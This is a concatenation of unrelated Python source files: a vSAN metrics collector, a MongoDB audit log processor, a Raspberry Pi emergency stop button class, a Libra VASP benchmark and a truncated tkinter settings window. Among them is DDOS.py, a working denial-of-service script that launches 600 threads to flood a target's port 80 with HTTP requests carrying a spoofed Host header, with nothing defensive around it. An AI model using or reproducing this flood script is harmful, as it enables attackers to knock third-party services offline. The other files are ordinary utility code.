spaceReport = vsanSpaceReportSystem.VsanQuerySpaceUsage(
cluster=cluster_obj
)
except vmodl.fault.InvalidArgument as e:
print("Caught InvalidArgument exception : " + str(e))
return
except vmodl.fault.NotSupported as e:
print("Caught NotSupported exception : " + str(e))
return
except vmodl.fault.RuntimeFault as e:
print("Caught RuntimeFault exception : " + str(e))
return
timestamp = int(time.time() * 1000000000)
parseCapacity('global', spaceReport, tagsbase, timestamp)
parseCapacity('summary', spaceReport, tagsbase, timestamp)
if spaceReport.efficientCapacity:
parseCapacity('efficientcapacity', spaceReport, tagsbase, timestamp)
for object in spaceReport.spaceDetail.spaceUsageByObjectType:
parseCapacity(object.objType, object, tagsbase, timestamp)
    # Get information about the cluster disk balance (VsanClusterBalancePerDiskInfo)
vsanClusterHealthSystem = vcMos['vsan-cluster-health-system']
try:
clusterHealth = vsanClusterHealthSystem.VsanQueryVcClusterHealthSummary(
cluster=cluster_obj
)
except vmodl.fault.NotFound as e:
print("Caught NotFound exception : " + str(e))
return
except vmodl.fault.RuntimeFault as e:
print("Caught RuntimeFault exception : " + str(e))
return
for disk in clusterHealth.diskBalance.disks:
measurement = 'capacity_diskBalance'
tags = tagsbase
tags['uuid'] = disk.uuid
tags['hostname'] = disks[disk.uuid]
fields = {}
fields['varianceThreshold'] = clusterHealth.diskBalance.varianceThreshold
fields['fullness'] = disk.fullness
fields['variance'] = disk.variance
fields['fullnessAboveThreshold'] = disk.fullnessAboveThreshold
fields['dataToMoveB'] = disk.dataToMoveB
printInfluxLineProtocol(measurement, tags, fields, timestamp)
def getHealth(args, tagsbase, cluster_obj, vcMos,):
vsanClusterHealthSystem = vcMos['vsan-cluster-health-system']
try:
clusterHealth = vsanClusterHealthSystem.VsanQueryVcClusterHealthSummary(
cluster=cluster_obj
)
except vmodl.fault.NotFound as e:
print("Caught NotFound exception : " + str(e))
return
except vmodl.fault.RuntimeFault as e:
print("Caught RuntimeFault exception : " + str(e))
return
timestamp = int(time.time() * 1000000000)
for group in clusterHealth.groups:
splitGroupId = group.groupId.split('.')
testName = splitGroupId[-1]
parseHealth(testName, group.groupHealth, tagsbase, timestamp)
def isFilesExist(listFile):
result = True
for file in listFile:
if not os.path.isfile(file):
result = False
return result
def isTTLOver(listFile, TTL):
result = True
for file in listFile:
if os.path.isfile(file):
filemodificationtime = datetime.fromtimestamp(os.stat(file).st_mtime) # This is a datetime.datetime object!
now = datetime.today()
max_delay = timedelta(minutes=TTL)
if now - filemodificationtime < max_delay:
result = False
return result
def isHostsConnected(cluster, witnessHosts, si):
result = True
for host in cluster.host:
if not host.summary.runtime.connectionState == 'connected':
result = False
for witnesshost in witnessHosts:
host = (vim.HostSystem(witnesshost.host._moId, si._stub))
if not host.summary.runtime.connectionState == 'connected':
result = False
return result
def pickelDumpObject(object, filename):
fileObject = open(filename, 'wb')
pickle.dump(object, fileObject)
fileObject.close()
def pickelLoadObject(filename):
if os.path.isfile(filename):
fileObject = open(filename, 'rb')
object = pickle.load(fileObject)
return object
else:
print("Can't open cache file : " + filename)
return -1
# Gather information about uuids, disks and hostnames
# Store them in cache files if needed
def manageData(args, si, cluster_obj, vcMos):
vsanVcStretchedClusterSystem = vcMos['vsan-stretched-cluster-system']
# Witness
# Retrieve Witness Host for given VSAN Cluster
witnessHosts = vsanVcStretchedClusterSystem.VSANVcGetWitnessHosts(
cluster=cluster_obj
)
# Build cache's file names
uuidfilename = os.path.join(args.cachefolder, 'vsanmetrics_uuid-' + args.clusterName + '.cache')
disksfilename = os.path.join(args.cachefolder, 'vsanmetrics_disks-' + args.clusterName + '.cache')
vmsfilename = os.path.join(args.cachefolder, 'vsanmetrics_vms-' + args.clusterName + '.cache')
listFile = (uuidfilename, disksfilename, vmsfilename)
# By default, don't rebuild cache
rebuildcache = False
# Test if all needed cache files exists, if all hosts are connected and if TTL of the cache is not over
resultFilesExist = isFilesExist(listFile)
resultHostConnected = isHostsConnected(cluster_obj, witnessHosts, si)
resultTTLOver = isTTLOver(listFile, args.cacheTTL)
# Make decision if rebuilding cache is needed
if not resultFilesExist and not resultHostConnected:
print("One or more host disconnected. Can't continue")
return
else:
if not resultFilesExist and resultHostConnected:
rebuildcache = True
elif resultFilesExist and resultHostConnected and not resultTTLOver:
rebuildcache = False
elif resultFilesExist and resultHostConnected and resultTTLOver:
rebuildcache = True
if rebuildcache:
# Rebuild cache
        # Get uuid/name mappings for hosts and disks
uuid, disks = getInformations(witnessHosts, cluster_obj, si)
# Get VM uuid/names
vms = getVMs(cluster_obj)
pickelDumpObject(uuid, uuidfilename)
pickelDumpObject(disks, disksfilename)
pickelDumpObject(vms, vmsfilename)
else:
# Load data from cache
uuid = pickelLoadObject(uuidfilename)
disks = pickelLoadObject(disksfilename)
vms = pickelLoadObject(vmsfilename)
return uuid, disks, vms
def getPerformance(args, tagsbase, si, cluster_obj, vcMos, uuid, disks, vms):
vsanPerfSystem = vcMos['vsan-performance-manager']
# Gather a list of the available entity types (ex: vsan-host-net)
entityTypes = vsanPerfSystem.VsanPerfGetSupportedEntityTypes()
# query interval, last 10 minutes -- UTC !!!
endTime = datetime.utcnow()
startTime = endTime + timedelta(minutes=-10)
splitSkipentitytypes = []
if args.skipentitytypes:
splitSkipentitytypes = args.skipentitytypes.split(',')
result = ""
for entities in entityTypes:
if entities.name not in splitSkipentitytypes:
entitieName = entities.name
labels = []
# Gather all labels related to the entity (ex: iopsread, iopswrite...)
for entity in entities.graphs:
for metric in entity.metrics:
labels.append(metric.label)
# Build entity
entity = '%s:*' % (entities.name)
# Build spec object
spec = vim.cluster.VsanPerfQuerySpec(
endTime=endTime,
entityRefId=entity,
labels=labels,
startTime=startTime
)
# Get statistics
try:
metrics = vsanPerfSystem.VsanPerfQueryPerf(
querySpecs=[spec],
cluster=cluster_obj
)
except vmodl.fault.InvalidArgument as e:
print("Caught InvalidArgument exception : " + str(e))
return
except vmodl.fault.NotFound as e:
print("Caught NotFound exception : " + str(e))
return
except vmodl.fault.NotSupported as e:
print("Caught NotSupported exception : " + str(e))
return
except vmodl.fault.RuntimeFault as e:
print("Caught RuntimeFault exception : " + str(e))
return
except vmodl.fault.Timedout as e:
print("Caught Timedout exception : " + str(e))
return
except vmodl.fault.VsanNodeNotMaster as e:
print("Caught VsanNodeNotMaster exception : " + str(e))
return
for metric in metrics:
if not metric.sampleInfo == "":
measurement = entitieName
sampleInfos = metric.sampleInfo.split(",")
lenValues = len(sampleInfos)
timestamp = convertStrToTimestamp(sampleInfos[lenValues - 1])
tags = parseEntityRefId(measurement, metric.entityRefId, uuid, vms, disks)
tags.update(tagsbase)
fields = {}
for value in metric.value:
listValue = value.values.split(",")
fields[value.metricId.label] = float(listValue[lenValues - 1])
result = result + formatInfluxLineProtocol(measurement, tags, fields, timestamp)
print(result)
# Main...
def main():
# Parse CLI arguments
args = get_args()
# Initiate tags with vcenter and cluster name
tagsbase = {}
tagsbase['vcenter'] = args.vcenter
tagsbase['cluster'] = args.clusterName
try:
si, _, cluster_obj, vcMos = connectvCenter(args)
except Exception as e:
print("MAIN - Caught exception: " + str(e))
return
uuid, disks, vms = manageData(args, si, cluster_obj, vcMos)
threads = list()
# CAPACITY
if args.capacity:
x = threading.Thread(target=getCapacity, args=(args, tagsbase, cluster_obj, vcMos, uuid, disks, vms))
threads.append(x)
x.start()
# HEALTH
if args.health:
x = threading.Thread(target=getHealth, args=(args, tagsbase, cluster_obj, vcMos,))
threads.append(x)
x.start()
# PERFORMANCE
if args.performance:
x = threading.Thread(target=getPerformance, args=(args, tagsbase, si, cluster_obj, vcMos, uuid, disks, vms,))
threads.append(x)
x.start()
for _, thread in enumerate(threads):
thread.join()
return 0
# Start program
if __name__ == "__main__":
main()
|
DDOS.py
|
import socket
import threading
target = 'target ip'
fake_ip = '182.21.20.32'
port = 80
'''
def attack():
while True:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target, port))
s.sendto(("GET /" + target + " HTTP/1.1\r\n").encode('ascii'), (target, port))
s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (target, port))
s.close()
'''
def attack():
while True:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target, port))
s.sendto(("GET /" + target + " HTTP/1.1\r\n").encode('ascii'), (target, port))
s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (target, port))
global attack_num
attack_num += 1
print("Attack number :",attack_num,"\n")
s.close()
for i in range(600):
thread = threading.Thread(target=attack)
thread.start()
attack_num = 0
|
log_processor.py
|
try:
import argparse
import configparser
import datetime
import json
import kerberos
import logging
import os
import pymongo
import re
import signal
import socket
import sys
import time
import threading
from pymongo.errors import DuplicateKeyError, OperationFailure, InvalidDocument
from bson.json_util import loads
except ImportError as e:
print(e)
sys.exit(1)
def write_resume_token(signum, frame):
if resume_token:
if sys.version_info[0] < 3:
p = format(time.mktime(resume_token.timetuple()), '.1f')
else:
p = datetime.datetime.timestamp(resume_token)
outfile = open(token_file, 'w')
outfile.write(str(p))
outfile.close()
logging.info("RESUME TOKEN: %s %s" % (resume_token, p))
logging.info("TERMINATING PROCESSING: %s" % datetime.datetime.now())
sys.exit(0)
# Thread for heartbeat
# Contains own MongoDB connection
def heartbeat(config_data, debug=False):
try:
if config_data['AUDIT_DB_SSL'] is True:
if debug is True:
logging.debug("Using SSL/TLS")
print("Using SSL/TLS")
if config_data['AUDIT_DB_SSL_PEM'] is not None:
client = pymongo.MongoClient(config_data['AUDIT_DB_CONNECTION_STRING'], serverSelectionTimeoutMS=config_data['AUDIT_DB_TIMEOUT'], ssl=True, ssl_certfile=config_data['AUDIT_DB_SSL_PEM'], ssl_ca_certs=config_data['AUDIT_DB_SSL_CA'])
else:
client = pymongo.MongoClient(config_data['AUDIT_DB_CONNECTION_STRING'], serverSelectionTimeoutMS=config_data['AUDIT_DB_TIMEOUT'], ssl=True, ssl_ca_certs=config_data['AUDIT_DB_SSL_CA'])
else:
if debug is True:
logging.debug("Not ussing SSL/TLS")
print("Not using SSL/TLS")
client = pymongo.MongoClient(config_data['AUDIT_DB_CONNECTION_STRING'], serverSelectionTimeoutMS=config_data['AUDIT_DB_TIMEOUT'])
client.admin.command('ismaster')
except (pymongo.errors.ServerSelectionTimeoutError, pymongo.errors.ConnectionFailure) as e:
logging.error("Cannot connect to Audit DB, please check settings in config file: %s" %e)
print("Cannot connect to DB, please check settings in config file: %s" %e)
raise
heartbeat_db = client['logging']
heartbeat_collection = heartbeat_db['heartbeats']
try:
heartbeat_collection.insert_one({'host': config_data['DISPLAY_NAME'],'msg': 'STARTING PROCESSING', 'timestamp': datetime.datetime.now(), 'type': 'log processor'})
except OperationFailure as e:
print("""\033[91mHeartbeat Operational Error: %s\n\033[m""" % e)
logging.error("Heartbeat Operational Error: %s\n" % e)
while True:
try:
heartbeat_collection.insert_one({'host': config_data['DISPLAY_NAME'], 'timestamp': datetime.datetime.now(), 'type': 'log processor'})
time.sleep(config_data['HB_INTERVAL'])
except OperationFailure as e:
print("""\033[91mHeartbeat Operational Error: %s\n\033[m""" % e)
logging.error("Heartbeat Operational Error: %s\n" % e)
# global variable
resume_token = None
signal.signal(signal.SIGINT, write_resume_token)
signal.signal(signal.SIGTERM, write_resume_token)
class UTC(datetime.tzinfo):
"""UTC"""
def utcoffset(self, dt):
return datetime.timedelta(0)
def tzname(self, dt):
return "UTC"
def dst(self, dt):
return datetime.timedelta(0)  # UTC has no DST offset
def get_cmd_args():
parser = argparse.ArgumentParser(description='Script to process MongoDB audit log')
parser.add_argument('--config','-c', dest='config_file', default=sys.path[0] + '/log_processor.conf', required=False, help="Alternative location for the config file")
parser.add_argument('--log','-l', dest='log_file', default=sys.path[0] + '/log_processor.log', required=False, help="Alternative location for the log file")
parser.add_argument('--token','-t', dest='token_file', default=sys.path[0] + '/.log_tokens', required=False, help="Alternative location for the token file (make it hidden)")
return parser.parse_args()
def get_config(args):
CONF_FILE = args.config_file
LOG_FILE = args.log_file
# Get config settings from the config file (default: log_processor.conf)
if os.path.isfile(CONF_FILE) == False:
logging.basicConfig(filename=LOG_FILE,level=logging.ERROR)
logging.error('The config file must exist in the same directory as the Python script')
print('\033[93m' + 'The config file must exist in the same directory as the Python script, exiting' + '\033[m')
sys.exit(1)
config = configparser.ConfigParser()
config.read(CONF_FILE)
config_options = {}
try:
config_options['debug'] = config.getboolean('general','debug', fallback=False)
config_options['AUDIT_DB_CONNECTION_STRING'] = config.get('audit_db','connection_string')
config_options['AUDIT_DB_SSL'] = config.getboolean('audit_db','ssl_enabled',fallback=False)
if config_options['AUDIT_DB_SSL'] is True:
config_options['AUDIT_DB_SSL_PEM'] = config.get('audit_db','ssl_pem_path', fallback=None)
config_options['AUDIT_DB_SSL_CA'] = config.get('audit_db', 'ssl_ca_cert_path')
config_options['AUDIT_DB_TIMEOUT'] = config.getint('audit_db','timeout', fallback=10)
config_options['ELEVATED_OPS_EVENTS'] = config.get('general','elevated_ops_events',fallback='').split(',')
config_options['ELEVATED_CONFIG_EVENTS'] = config.get('general','elevated_config_events',fallback='').split(',')
config_options['ELEVATED_APP_EVENTS'] = config.get('general','elevated_app_events',fallback='').split(',')
config_options['AUDIT_LOG'] = config.get('general','audit_log',fallback=sys.path[0] + "/audit.log")
config_options['HB_INTERVAL'] = config.getint('general','hb_interval', fallback=60)
config_options['DISPLAY_NAME'] = config.get('general','display_name', fallback=socket.gethostname())
except (configparser.NoOptionError,configparser.NoSectionError) as e:
logging.basicConfig(filename=LOG_FILE,level=logging.ERROR)
logging.error("The config file is missing data: %s" % e)
print("""\033[91mERROR! The config file is missing an option: %s.
It should be in the following format:
\033[92m
[audit_db]
connection_string=mongodb://auditor%%40MONGODB.LOCAL@audit.mongodb.local:27017/?replicaSet=repl0&authSource=$external&authMechanism=GSSAPI
timeout=1000
ssl_enabled=True
ssl_pem_path=/data/pki/mongod3.mongodb.local.pem
ssl_ca_cert_path=/data/pki/ca.ce\n
[general]
debug=true
audit_log=/data/logs/audit_log
elevated_config_events=shutdown,setParameter,setFeatureCompatibilityVersion,addShard,addShardToZone,balancerStart,balancerStop,enableSharding,flushRouterConfig,moveChunk,mergeChunks,removeShard,removeShardFromZone,setShardVersion,shardCollection,splitChunk,unsetSharding,updateZoneKeyRange,replSetReconfig,replSetInitiate
elevated_ops_events=createUser,deleteUser
elevated_app_events=dropCollection,dropDatabase
\033[m""" % e)
sys.exit(1)
return config_options
def create_tz_dtg(temp_time):
if sys.version_info[0] < 3:
utc_time = datetime.datetime.fromtimestamp(float(temp_time), UTC())
else:
utc_time = datetime.datetime.fromtimestamp(float(temp_time),datetime.timezone.utc)
return utc_time
def get_resume_token():
# Get resume token, if it exists
if os.path.isfile(token_file):
try:
token_handle = open(token_file,'r')
temp_line = token_handle.readline().strip()
token = create_tz_dtg(temp_line)
except ValueError:
print('\033[91m' + "Incorrect format for timestamp: %s, reprocessing all data" % temp_line)
print('\033[m')
token = create_tz_dtg(0)
finally:
token_handle.close()
else:
token = create_tz_dtg(0)
return token
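# Editor's note (illustrative, not from the original): the token file read above and
# written by write_resume_token() is expected to contain a single epoch timestamp,
# e.g. a file whose whole content is:
#   1580000000.0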
# Record our startup and config
def record_startup(config_array, debug=False):
if debug == True:
logging.info("STARTING PROCESSING: %s" % datetime.datetime.now())
logging.debug("AUDIT CONNECTION STRING: %s" % re.sub('//.+@', '//<REDACTED>@', config_array['AUDIT_DB_CONNECTION_STRING']))
logging.debug("AUDIT LOG: %s" % config_array['AUDIT_LOG'])
logging.debug("CONFIG EVENTS: %s" % config_array['ELEVATED_CONFIG_EVENTS'])
logging.debug("OPS EVENTS: %s" % config_array['ELEVATED_OPS_EVENTS'])
logging.debug("APP EVENTS: %s" % config_array['ELEVATED_APP_EVENTS'])
logging.debug("RESUME TOKEN: %s" % config_array['resume_token'])
print("AUDIT CONNECTION STRING: %s" % re.sub('//.+@', '//<REDACTED>@', config_array['AUDIT_DB_CONNECTION_STRING']))
print("AUDIT LOG: %s" % config_array['AUDIT_LOG'])
print("OPS EVENTS: %s" % config_array['ELEVATED_OPS_EVENTS'])
print("CONFIG EVENTS: %s" % config_array['ELEVATED_CONFIG_EVENTS'])
print("APP EVENTS: %s" % config_array['ELEVATED_APP_EVENTS'])
print("RESUME TOKEN: %s" % config_array['resume_token'])
else:
logging.info("STARTING PROCESSING: %s" % datetime.datetime.now())
# Connect to MongoDB
def audit_db_client(audit_db_data, debug=False):
try:
if audit_db_data['AUDIT_DB_SSL'] is True:
if debug is True:
logging.debug("Using SSL/TLS")
print("Using SSL/TLS")
if audit_db_data['AUDIT_DB_SSL_PEM'] is not None:
client = pymongo.MongoClient(audit_db_data['AUDIT_DB_CONNECTION_STRING'], serverSelectionTimeoutMS=audit_db_data['AUDIT_DB_TIMEOUT'], ssl=True, ssl_certfile=audit_db_data['AUDIT_DB_SSL_PEM'], ssl_ca_certs=audit_db_data['AUDIT_DB_SSL_CA'])
else:
client = pymongo.MongoClient(audit_db_data['AUDIT_DB_CONNECTION_STRING'], serverSelectionTimeoutMS=audit_db_data['AUDIT_DB_TIMEOUT'], ssl=True, ssl_ca_certs=audit_db_data['AUDIT_DB_SSL_CA'])
else:
if debug is True:
logging.debug("Not ussing SSL/TLS")
print("Not using SSL/TLS")
client = pymongo.MongoClient(audit_db_data['AUDIT_DB_CONNECTION_STRING'], serverSelectionTimeoutMS=audit_db_data['AUDIT_DB_TIMEOUT'])
client.admin.command('ismaster')
except (pymongo.errors.ServerSelectionTimeoutError, pymongo.errors.ConnectionFailure) as e:
logging.error("Cannot connect to Audit DB, please check settings in config file: %s" %e)
print("Cannot connect to DB, please check settings in config file: %s" %e)
raise
db = client['logging']
collection = db['logs']
return collection
# check if our keys are valid for BSON
def clean_data(unclean_json, debug=False):
if type(unclean_json) is dict:
for k, v in list(unclean_json.items()):  # iterate over a copy since keys may be renamed below
if debug:
logging.debug("KEY: %s" % k)
print("KEY: %s" % k)
if type(v) is dict:
v = clean_data(v, debug)
if type(v) is list:
v = clean_list_data(v, debug)
if k[0] in [ '$', '*'] and k not in ['$data', '$code', '$binary','$decimal128', '$int64', '$min_key','$max_key','$objectid','$regex', '$timestamp']:
if debug:
logging.debug("ISSUE: %s" % k)
print("""\03393mISSUE: %s\033[m""" % k)
unclean_json[k[1:]] = unclean_json.pop(k)
k = k[1:]
unclean_json[k.replace('.','_')] = unclean_json.pop(k)
return unclean_json
# Diving further down the rabbit hole
def clean_list_data(unclean_data, debug=False):
if type(unclean_data) is list:
for value in unclean_data:
if debug:
logging.debug("ELEMENT: %s" % value)
print("ELEMENT: %s" % value)
if type(value) is dict:
if debug:
logging.debug("ANOTHER DICT: %s" % value)
print("ANOTHER DICT: %s" % value)
unclean_data[unclean_data.index(value)] = clean_data(value, debug)
return unclean_data
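# Editor's note (illustrative example, not in the original): given the rules in
# clean_data() above, a document such as {'$set': {'a.b': 1}} would come back as
# {'set': {'a_b': 1}} -- the leading '$' is stripped from non-whitelisted keys and
# '.' is replaced with '_' so the document can be inserted into MongoDB.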
def main():
global resume_token
global token_file
# get our config
args = get_cmd_args()
token_file = args.token_file
config_data = get_config(args)
# retrieve and add our resume token to the config data
# `resume_token` is a global variable so exit handlers can grab it easily
config_data['resume_token'] = get_resume_token()
resume_token = config_data['resume_token']
# setup logging
debug = config_data['debug']
if debug == True:
logging.basicConfig(filename=args.log_file,level=logging.DEBUG)
else:
logging.basicConfig(filename=args.log_file,level=logging.INFO)
#start heartbeats
hb = threading.Thread(target=heartbeat, args=(config_data, debug))
hb.daemon = True
hb.start()
# log our startup and the various settings
record_startup(config_data, debug)
# Connect to the mongodb database
audit_db = audit_db_client(config_data, debug)
# set for a new start or restart
restart = True
# if no audit file we will just wait to see if one turns up :-)
while os.path.isfile(config_data['AUDIT_LOG']) == False:
time.sleep(10)
f = open(config_data['AUDIT_LOG'], "rb")
# start reading our audit log
while 1:
where = f.tell()
line = f.readline()
if not line:
time.sleep(1)
f.seek(where)
else:
try:
# retrieve line
unclean_line = loads(line)
if config_data['debug']:
print("CURRENT TS: %s" % unclean_line['ts'])
# Process this entry if it is newer than the resume token, or if we are already past the restart state.
# On a restart we do not want to re-process data we have already seen.
if (unclean_line['ts'] > resume_token) or restart == False:
# we know we are now not in the restart for first start state, so declare that
restart = False
# clean line (if required) to remove some un-BSON key names
clean_line = clean_data(unclean_line, debug)
# retrieve the array of users so our subsequent querying is easier and faster
clean_line['users_array'] = []
for user_data in clean_line['users']:
clean_line['users_array'].append(user_data['user'])
# Insert tags as required
if ('command' in clean_line['param'] and clean_line['param']['command'] in config_data['ELEVATED_CONFIG_EVENTS']) or clean_line['atype'] in config_data['ELEVATED_CONFIG_EVENTS']:
clean_line['tag'] = 'CONFIG EVENT'
if 'command' in clean_line['param'] and clean_line['param']['command'] in config_data['ELEVATED_OPS_EVENTS']:
clean_line['tag'] = 'OPS EVENT'
elif 'command' in clean_line['param'] and clean_line['param']['command'] in config_data['ELEVATED_APP_EVENTS']:
clean_line['tag'] = 'APP EVENT'
clean_line['host'] = socket.gethostname()
clean_line['source'] = 'DATABASE AUDIT'
# set schema version
clean_line['schema_version'] = 0
# Get our newest resume token
resume_token = clean_line['ts']
if debug:
print(clean_line)
print("RESUME TOKEN: %s" % resume_token)
# insert data
audit_db.insert_one(clean_line)
else:
if debug is True:
print("Datestamp already seen: %s" % unclean_line['ts'])
logging.debug("Datestamp already seen: %s" % unclean_line['ts'])
except OperationFailure as e:
print("""\033[91mOperational Error: %s\nDocument: %s\033[m""" % (e, unclean_line))
logging.error("Operational Error: %s\nDocument: %s" % (e, unclean_line))
except ValueError as e:
print("""\033[91mValue Error: %s\nDocument: %s\033[m""" % (e, unclean_line))
logging.error("Value Error: %s\nDocument: %s" % (e, unclean_line))
continue
except InvalidDocument as e:
print("""\033[91mDocument Error: %s\nDocument: %s\033[m""" % (e, unclean_line))
logging.error("Document Error: %s\nDocument: %s" % (e, unclean_line))
continue
if __name__ == "__main__":
logger = logging.getLogger(__name__)
main()
|
EmergencyStopButton.py
|
"""
Zachary Cook
Class representing the hardware emergency stop button.
"""
# Channel of the Emergency Stop button (Pin 11).
EMERGENCY_STOP_CHANNEL = 17
import threading
import time
from Controller import Observer
# RPi is only on the Raspberry Pi.
from RPi import GPIO
"""
Class representing an emergency stop button.
"""
class EmergencyStopButton(Observer.Observable):
"""
Creates the emergency stop button.
"""
def __init__(self):
super().__init__()
self.lastState = False
# Set up the pins.
GPIO.setmode(GPIO.BCM)
GPIO.setup(EMERGENCY_STOP_CHANNEL,GPIO.IN,pull_up_down=GPIO.PUD_UP)
# Start polling the button pressing.
self.startPolling()
"""
Returns if the button is pressed.
"""
def isPressed(self):
return GPIO.input(EMERGENCY_STOP_CHANNEL)
"""
Starts the polling for the button presses.
"""
def startPolling(self):
# Performs polling.
def startPolling():
while True:
newButtonState = self.isPressed()
# Notify the observers if the state changed.
if newButtonState != self.lastState:
self.lastState = newButtonState
self.notify(newButtonState)
# Add an artificial delay for polling.
time.sleep(0.05)
# Create and start a thread for polling.
threading.Thread(target=startPolling).start()
|
remote_benchmark.py
|
# Copyright (c) The Libra Core Contributors
# SPDX-License-Identifier: Apache-2.0
from ..business import VASPInfo, BusinessContext
from ..protocol import OffChainVASP
from ..libra_address import LibraAddress
from ..payment_logic import PaymentCommand, PaymentProcessor
from ..status_logic import Status
from ..storage import StorableFactory
from ..payment import PaymentAction, PaymentActor, PaymentObject, StatusObject
from ..asyncnet import Aionet
from ..core import Vasp
from ..crypto import ComplianceKey
from .basic_business_context import TestBusinessContext
import logging
import json
from mock import AsyncMock
from unittest.mock import MagicMock
from threading import Thread
import time
import asyncio
from aiohttp import web
import sys
from json import loads, dumps
import aiohttp
logging.basicConfig(
level=logging.ERROR, format="[%(levelname)s] %(asctime)s: %(message)s"
)
class SimpleVASPInfo(VASPInfo):
''' Simple implementation of VASPInfo. '''
def __init__(self, my_configs, other_configs, port=0):
self.my_configs = my_configs
self.other_configs = other_configs
self.port = port
def get_peer_base_url(self, other_addr):
protocol = 'https://' if self.port == 443 else 'http://'
base_url = self.other_configs['base_url']
port = self.port if self.port != 0 else self.other_configs['port']
return f'{protocol}{base_url}:{port}'
def get_peer_compliance_verification_key(self, other_addr):
return self.other_configs['key']
def get_my_compliance_signature_key(self, my_addr):
return self.my_configs['key']
def get_TLS_cert_path(self, other_addr):
host = self.other_configs['base_url']
return f'/home/ubuntu/{host}-nginx-selfsigned.crt'
def load_configs(configs_path):
''' Loads VASP configs from file. '''
with open(configs_path, 'r') as f:
configs = loads(f.read())
assert 'addr' in configs
assert 'base_url' in configs
assert 'port' in configs
assert 'key' in configs
bytes_addr = configs['addr'].encode()
configs['addr'] = LibraAddress.from_bytes(bytes_addr)
configs['port'] = int(configs['port'])
configs['key'] = ComplianceKey.from_str(dumps(configs['key']))
return configs
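# Editor's note: load_configs() above expects a JSON file providing the four asserted
# keys. A hypothetical example (every value is a placeholder, not a real address,
# URL or key):
# {
#     "addr": "<LibraAddress bytes as a string>",
#     "base_url": "vasp1.example.com",
#     "port": "8000",
#     "key": {"<ComplianceKey JSON as accepted by ComplianceKey.from_str>": "..."}
# }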
def run_server(my_configs_path, other_configs_path, num_of_commands=10, loop=None):
''' Run the VASP as server (do not send commands).
The arguments <my_configs_path> and <other_configs_path> are paths to
files describing the configurations of the current VASP and of the other
VASP, respectively. Configs are dicts of the following form:
configs = {
'addr': <LibraAddress>,
'base_url': <str>,
'port': <int>,
}
'''
my_configs = load_configs(my_configs_path)
other_configs = load_configs(other_configs_path)
my_addr = my_configs['addr']
other_addr = other_configs['addr']
# Create VASP.
vasp = Vasp(
my_addr,
host='0.0.0.0',
port=my_configs['port'],
business_context=AsyncMock(spec=BusinessContext),
info_context=SimpleVASPInfo(my_configs, other_configs),
database={}
)
logging.info(f'Created VASP {my_addr.as_str()}.')
# Run VASP services.
logging.info(f'Running VASP {my_addr.as_str()}.')
loop = asyncio.get_event_loop() if loop is None else loop
vasp.set_loop(loop)
vasp.start_services()
logging.info(f'VASP services are running on port {vasp.port}.')
def stop_server(vasp):
channel = vasp.vasp.get_channel(other_addr)
requests = len(channel.other_request_index)
while requests < num_of_commands:
requests = len(channel.other_request_index)
time.sleep(0.1)
vasp.close()
Thread(target=stop_server, args=(vasp,)).start()
try:
loop.run_forever()
finally:
loop.run_until_complete(loop.shutdown_asyncgens())
loop.close()
def run_client(my_configs_path, other_configs_path, num_of_commands=10, port=0):
''' Run the VASP's client to send commands to the other VASP.
The VASP sends <num_of_commands> commands to the other VASP, on port <port>.
If <port> is 0, the VASP defaults to the port specified in <other_configs>.
Being able to easily modify the port makes it quick to test performance
in different situations, such as HTTP, HTTPS, or a custom port.
The arguments <my_configs_path> and <other_configs_path> are paths to
files describing the configurations of the current VASP and of the other
VASP, respectively. Configs are dicts of the following form:
configs = {
'addr': <LibraAddress>,
'base_url': <str>,
'port': <int>,
}
'''
assert num_of_commands > 0
my_configs = load_configs(my_configs_path)
other_configs = load_configs(other_configs_path)
my_addr = my_configs['addr']
other_addr = other_configs['addr']
# Create VASP.
vasp = Vasp(
my_addr,
host='0.0.0.0',
port=my_configs['port'],
business_context=TestBusinessContext(my_addr),
info_context=SimpleVASPInfo(my_configs, other_configs, port),
database={}
)
logging.info(f'Created VASP {my_addr.as_str()}.')
# Run VASP services.
def start_services(vasp, loop):
vasp.start_services()
logging.debug('Start main loop.')
try:
loop.run_forever()
finally:
loop.run_until_complete(loop.shutdown_asyncgens())
loop.close()
loop = asyncio.new_event_loop()
vasp.set_loop(loop)
t = Thread(target=start_services, args=(vasp, loop), daemon=True)
t.start()
logging.info(f'VASP services are running on port {vasp.port}.')
# Make the payment commands.
commands = []
for cid in range(num_of_commands):
sub_a = LibraAddress.from_bytes(b'A'*16, b'a'*8).as_str()
sub_b = LibraAddress.from_bytes(b'B'*16, b'b'*8).as_str()
sender = PaymentActor(sub_b, StatusObject(Status.none), [])
receiver = PaymentActor(sub_a, StatusObject(Status.none), [])
action = PaymentAction(10, 'TIK', 'charge', 994773)
reference = f'{my_addr.as_str()}_{cid}'
payment = PaymentObject(
sender, receiver, reference, 'orig_ref', 'desc', action
)
cmd = PaymentCommand(payment)
commands += [cmd]
# Send commands.
logging.info(
'Start measurements: '
f'sending {num_of_commands} commands to {other_addr.as_str()}.'
)
logging.info(
f'The target URL is {vasp.info_context.get_peer_base_url(other_addr)}'
)
start_time = time.perf_counter()
async def send_commands(vasp, commands):
return await asyncio.gather(
*[vasp.new_command_async(other_addr, c) for c in commands],
return_exceptions=True
)
res = asyncio.run_coroutine_threadsafe(send_commands(vasp, commands), loop)
res = res.result()
elapsed = (time.perf_counter() - start_time)
# Display performance and success rate.
success_number = sum(1 for r in res if not isinstance(r, Exception))  # with return_exceptions=True, failures come back as exception objects
logging.info(f'Commands executed in {elapsed:0.2f} seconds.')
logging.info(f'Success #: {success_number}/{len(commands)}.')
logging.info(f'Estimated throughput #: {len(commands)/elapsed} TPS.')
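# Editor's note: a minimal way to drive the two helpers above, assuming hypothetical
# config file names and running each call on its own host/process:
#   run_server('vasp_a_configs.json', 'vasp_b_configs.json', num_of_commands=100)
#   run_client('vasp_b_configs.json', 'vasp_a_configs.json', num_of_commands=100, port=0)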
|
settings_window.py
|
from tkinter import *
from tkinter import ttk, filedialog, messagebox
import threading
import json
import os
def reset_settings_window(win, download_btn, done_btn, _stabalize, apply_btn):
_stabalize[0] = 1
_stabalize[1] = 1
_stabalize[2] = 1
_stabalize[3] = 1
state = str(done_btn['state'])
if state == 'disabled':
download_btn.configure(state=ACTIVE)
setting = SettingsWindow()
setting.hold_variables(apply_btn, win)
class SettingsWindow(object):
"""
* Settings Window
"""
